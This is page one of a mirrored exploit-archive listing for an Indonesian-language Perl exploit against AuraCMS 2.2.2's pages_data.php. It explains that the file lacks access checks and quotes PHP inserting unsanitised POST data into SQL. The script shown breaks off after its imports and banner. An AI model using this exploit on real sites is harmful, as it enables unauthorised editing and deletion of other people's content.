AuraCMS - Exploit - hacking technology

AuraCMS

Add date: 07/28/2008 Publishing date: 07/28/2008 Hits: 19

Total 2 pages, Current page:1, Jump to page:

#! /usr/bin/perl
# k1tk4t Public Security Advisory
# ////////////////////////////////////////////////////////////
# AuraCMS <= 2.2.2 (pages_data.php) Arbitrary Edit/Add/Delete data halaman exploit
# Vendor: http://www.auracms.org/
# Kutu: ./js/pages/pages_data.php
# Keterangan:
# berkas pages_data.php dari awal hingga akhir tidak adanya aturan yang jelas, siapa, hak, level
# dalam mengakses berkas ini, kenapa perlu kejelasan aturan untuk berkas ini?
# karena didalam berkas ini terdapat kode yang dapat menghapus(delete)
# menambahkan(add), mengedit(edit) data halaman didalam database auracms, sehingga
# dengan tidak adanya kejelasan aturan berkas pages_data.php ini
# maka berkas ini mutlak terdapat KUTU yang amat menjijikan…. huee .....   : (
# potongan kode dari pages_data.php
# --//--
# 03: @ob_start ('ob_gzhandler');
# 04: @header (“Content-type: text/plain; charset=utf-8; ”);
# 05: @header (“Cache-Control: no-cache, must-revalidate”); // HTTP/1.1
# 06: @header (“Pragma: no-cache”);
# 07:
# 08: include '. /. /includes/session.php';
# 09: include '. /. /includes/config.php';
# 10: include '. /. /includes/fungsi.php';
# 11: include '. /. /includes/mysql.php';
# 12: include '. /. /includes/json.php';
# 13:
# 14:
# 15: if (! isset ($_SESSION ['mod_ajax'])){
# 16: exit;
# 17: }
# --//--
# Lihat…. tidak ada aturan di baris pertama hingga baris ke 17, mengenai siapa, hak, level dan aturan lainnya
# dalam mengakses berkas ini
# --//--
# 20: switch (@$_GET ['action']) {
# 21:
# 22: case 'add':
# 23: $_POST = array_map ('decodeURIComponent', $_POST);
# 24: $judul = $_POST ['judul'];
# 25: $konten = $_POST ['konten'];
# 26: $open ['error'] = false;
# 27: $open ['errorpesan'] = '';
# 28: if (! empty($judul) &&! empty($konten)) {
# 29: $query = mysql_query (“INSERT INTO `halaman `(`judul `, `konten `) VALUES ('$judul', '$konten')”);
# 30: if ($query) {
# --//--
# diatas ini satu contoh bagaimana berkas ini berperilaku, lihat… bisa menambahkan data halaman database kan…
# kacoooo, kacoooo: (
# selebihnya liat sendiri yaa… panjang soalnya…: p
#
# Terimakasih untuk;
# str0ke, DNX, n0c0py, L41n,
# NTOS-Team->[fl3xu5, opt1lc, sakitjiwa],
# eCHo-> [y3dips, K-159, lirva32, dan staff lainnya]
use LWP::UserAgent;
use HTTP::Cookies;
use Getopt::Long;

if (! $ARGV[1]) {
print “\ n ///////////////////////////////////////////////////////////”;
print “\ n //                .:: > k1tk4t <::.                     // ";
print “\ n //     AuraCMS <= 2.2.2 (pages_data.php)                 // ";
print “\ n //     Arbitrary Edit/Add/Delete data halaman exploit    // ";

Other pages: : 1 * 2 * Next>>

Prev:BoonEx Ray 3.5 (sIncPath) Remote File Inclusion Vulnerability

Next:Dreampics Builder (page) Remote SQL Injection Vulnerability

Comment:

Category: Home > Exploit